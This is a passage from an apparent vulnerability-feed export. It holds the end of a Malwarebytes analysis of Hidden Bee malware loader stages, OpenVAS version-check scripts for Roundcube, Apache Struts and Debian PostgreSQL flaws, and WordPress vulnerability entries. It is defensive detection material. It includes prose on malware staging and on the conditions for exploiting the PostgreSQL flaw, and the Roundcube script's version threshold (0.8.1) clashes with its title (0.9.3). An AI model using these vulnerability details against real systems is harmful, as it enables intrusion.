package, the list of URLs (JPG, PNG) from the previous module is copied. Then, the ARIA key is copied. The size of the module and its SHA256 hash are updated. Then, the execution is redirected to the first stage shellcode fetched from the !rcx.\n\nThis shellcode was the one that we saw at first, after decoding the !rcx package from the JPG. Yet, looking at this part, we do not see anything malicious. The elements that are more important are well protected and revealed at the next execution stages.\n\nThe shellcode from the !rcx package is executed in two stages. The first one unpacks and prepares the second. First, it loads its own imports using hardcoded names of libraries.\n\n\n\nThe checksums of the functions that are going to be used are stored in the module and compared with the names calculated by the function: \n\nThe checksum calculation algorithm\n\nIt uses the functions from kernel32.dll: GetProcessHeap, VirtualAlloc, VirtualFree, and from ntdll.dll: RtlAllocateHeap, RtlFreeHeap, NtQueryInformationProcess.\n\nThe repackaged !rcx module is supposed to be supplied as one of the arguments at the Entry Point of the first shellcode. It is most important because the second stage shellcode will be unpacked from the supplied !rcx package.\n\nChecking the !rcx magic (first stage shellcode)\n\nA new memory area is allocated, and the second stage shellcode is unpacked there.\n\nDecoding and calling next module\n\nInside the second shellcode, we see strings referencing further components of the Hidden Bee malware:\n\n` /bin/i386/preload \n/bin/i386/coredll.bin `\n\nThe role of the second stage is unpacking another part from the !rcx: an !rdx package. \n\n Checking the !rdx magic (second stage shellcode)\n\nFrom our previous experience, we know that the !rdx package is a custom filesystem containing modules. Indeed, after the decryption is complete, the custom filesystem is revealed:\n\n\n\nSo the part that was hidden in the JPG is, in reality, a package that decrypts the custom filesystem and deploys the next stage modules: `/bin/i386/preload` and `/bin/i386/coredll.bin`. This filesystem has even more elements that are loaded at later stages of the infection. Their full functionality will be described in the next article in our series.\n\n### Even more hidden\n\nFrom the beginning, Hidden Bee malware has been well designed and innovative. Looking at one year of its evolution, we can be sure that the authors are serious about making it even more stealthy\u2014and they don't stop improving it.\n\nAlthough the initial dropper uses components analogous to ones observed in the past, revealing their encrypted content now takes many more steps and much more patience. The additional difficulty in the analysis is introduced by the fact that the URLs and encryption keys are never reused, and work only for a single session.\n\nThe team behind this malware is skilled and determined. We expect that the Hidden Bee malware won't be going extinct anytime soon.\n\nThe post [The Hidden Bee infection chain, part 1: the stegano pack](<https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-08-15T15:26:55", "published": "2019-08-15T15:26:55", "id": "MALWAREBYTES:787E98D1B1057EA67AB600F0E0353E27", "href": "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/", "type": "malwarebytes", "title": "The Hidden Bee infection chain, part 1: the stegano pack", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-09-12T16:58:21", "bulletinFamily": "scanner", "description": "Roundcube Webmail is prone to multiple cross-site scripting vulnerabilities.", "modified": "2019-09-10T00:00:00", "published": "2019-09-02T00:00:00", "id": "OPENVAS:1361412562310114124", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310114124", "title": "Roundcube Webmail < 0.9.3 Multiple XSS Vulnerabilities", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:roundcube:webmail';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.114124\");\n script_version(\"2019-09-10T11:55:44+0000\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 11:55:44 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-02 15:35:24 +0200 (Mon, 02 Sep 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2013-5645\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Roundcube Webmail < 0.9.3 Multiple XSS Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_roundcube_detect.nasl\");\n script_mandatory_keys(\"roundcube/detected\");\n\n script_tag(name:\"summary\", value:\"Roundcube Webmail is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"These XSS vulnerabilities allow user-assisted remote attackers to inject\n arbitrary web scripts or HTML via the body of a message visited in (1) new or (2) draft mode, related\n to compose.inc and (3) might allow remote authenticated users to inject arbitrary web scripts or HTML\n via an HTML signature, related to save_identity.inc.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Roundcube Webmail versions before 0.9.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 0.9.3, or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/roundcube/roundcubemail/issues/4283\");\n script_xref(name:\"URL\", value:\"https://github.com/roundcube/roundcubemail/wiki/Changelog#Release0.9.3\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version: version, test_version: \"0.8.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"0.8.1\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-30T12:58:35", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108626", "title": "Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108626\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(65400, 65999);\n script_cve_id(\"CVE-2014-0050\", \"CVE-2014-0094\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-020\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65400\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65999\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.16.2 or later.\");\n\n script_tag(name:\"insight\", value:\"The default upload mechanism in Apache Struts 2 is based on Commons\n FileUpload version 1.3 which is vulnerable and allows DoS attacks. Additional ParametersInterceptor\n allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader\n manipulation.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.1.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters or cause a Denial of Service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.16.2\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:34", "bulletinFamily": "scanner", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108627", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108627", "title": "Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Windows)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108627\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(65400, 65999);\n script_cve_id(\"CVE-2014-0050\", \"CVE-2014-0094\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts 2.x < 2.3.16.1 Multiple Vulnerabilities (S2-020) (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-020\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65400\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/65999\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.16.2 or later.\");\n\n script_tag(name:\"insight\", value:\"The default upload mechanism in Apache Struts 2 is based on Commons\n FileUpload version 1.3 which is vulnerable and allows DoS attacks. Additional ParametersInterceptor\n allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader\n manipulation.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.1.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters or cause a Denial of Service.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.16.2\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:34", "bulletinFamily": "scanner", "description": "ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108629", "title": "Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Windows)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108629\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(67064, 67081);\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67064\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67081\");\n\n script_tag(name:\"summary\", value:\"ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.20 or later.\");\n\n script_tag(name:\"insight\", value:\"The excluded parameter pattern introduced in version 2.3.16.1 to block\n access to getClass() method wasn't sufficient. It is possible to omit that with specially crafted requests.\n Also CookieInterceptor is vulnerable for the same kind of attack when it was configured to accept all\n cookies (when '*' is used to configure cookiesName param).\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.3.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.20\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-30T12:58:34", "bulletinFamily": "scanner", "description": "ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.", "modified": "2019-08-29T00:00:00", "published": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108628", "title": "Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108628\");\n script_version(\"2019-08-29T07:36:00+0000\");\n script_bugtraq_id(67064, 67081);\n script_cve_id(\"CVE-2014-0112\", \"CVE-2014-0113\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-29 07:36:00 +0000 (Thu, 29 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-28 07:41:10 +0000 (Wed, 28 Aug 2019)\");\n script_name(\"Apache Struts ClassLoader Manipulation Vulnerabilities (S2-021) (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67064\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67081\");\n\n script_tag(name:\"summary\", value:\"ClassLoader Manipulation allows remote attackers to execute\n arbitrary Java code.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts 2.3.20 or later.\");\n\n script_tag(name:\"insight\", value:\"The excluded parameter pattern introduced in version 2.3.16.1 to block\n access to getClass() method wasn't sufficient. It is possible to omit that with specially crafted requests.\n Also CookieInterceptor is vulnerable for the same kind of attack when it was configured to accept all\n cookies (when '*' is used to configure cookiesName param).\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.16.3.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker can execute arbitrary Java code via crafted\n parameters.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\nif(vers !~ \"^2\\.[0-3]\\.\")\n exit(99);\n\nif(version_in_range(version:vers, test_version:\"2.0.0\", test_version2:\"2.3.16.3\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2.3.20\", install_path:infos[\"location\"]);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-15T14:41:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-08-13T00:00:00", "published": "2019-08-10T00:00:00", "id": "OPENVAS:1361412562310891874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891874", "title": "Debian LTS Advisory ([SECURITY] [DLA-1874-1] postgresql-9.4 security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891874\");\n script_version(\"2019-08-13T22:56:08+0000\");\n script_cve_id(\"CVE-2007-2138\", \"CVE-2019-10208\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-13 22:56:08 +0000 (Tue, 13 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-10 02:00:07 +0000 (Sat, 10 Aug 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA-1874-1] postgresql-9.4 security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00007.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1874-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'postgresql-9.4'\n package(s) announced via the DSA-1874-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"* CVE-2019-10208: `TYPE` in `pg_temp` executes arbitrary SQL during\n`SECURITY DEFINER` execution\n\nVersions Affected: 9.4 - 11\n\nGiven a suitable `SECURITY DEFINER` function, an attacker can execute\narbitrary SQL under the identity of the function owner. An attack\nrequires `EXECUTE` permission on the function, which must itself contain\na function call having inexact argument type match. For example,\n`length('foo'::varchar)` and `length('foo')` are inexact, while\n`length('foo'::text)` is exact. As part of exploiting this\nvulnerability, the attacker uses `CREATE DOMAIN` to create a type in a\n`pg_temp` schema. The attack pattern and fix are similar to that for\nCVE-2007-2138.\n\nWriting `SECURITY DEFINER` functions continues to require following the\nconsiderations noted in the documentation:\n\nThe PostgreSQL project thanks Tom Lane for reporting this problem.\");\n\n script_tag(name:\"affected\", value:\"'postgresql-9.4' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n9.4.24-0+deb8u1.\n\nWe recommend that you upgrade your postgresql-9.4 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libecpg6\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpq5\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-9.4-dbg\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-client-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-contrib-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-doc-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-plperl-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-plpython-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-plpython3-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-pltcl-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"postgresql-server-dev-9.4\", ver:\"9.4.24-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2019-08-28T11:40:30", "bulletinFamily": "software", "description": "WordPress Vulnerability - WP Forum < 2.4 - Multiple SQL Injection\n", "modified": "2019-08-26T00:00:00", "published": "2019-08-26T00:00:00", "id": "WPVDB-ID:9781", "href": "https://wpvulndb.com/vulnerabilities/9781", "type": "wpvulndb", "title": "WP Forum < 2.4 - Multiple SQL Injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-28T15:46:42", "bulletinFamily": "software", "description": "WordPress Vulnerability - Google Calendar Events < 2.0.4 - XSS\n", "modified": 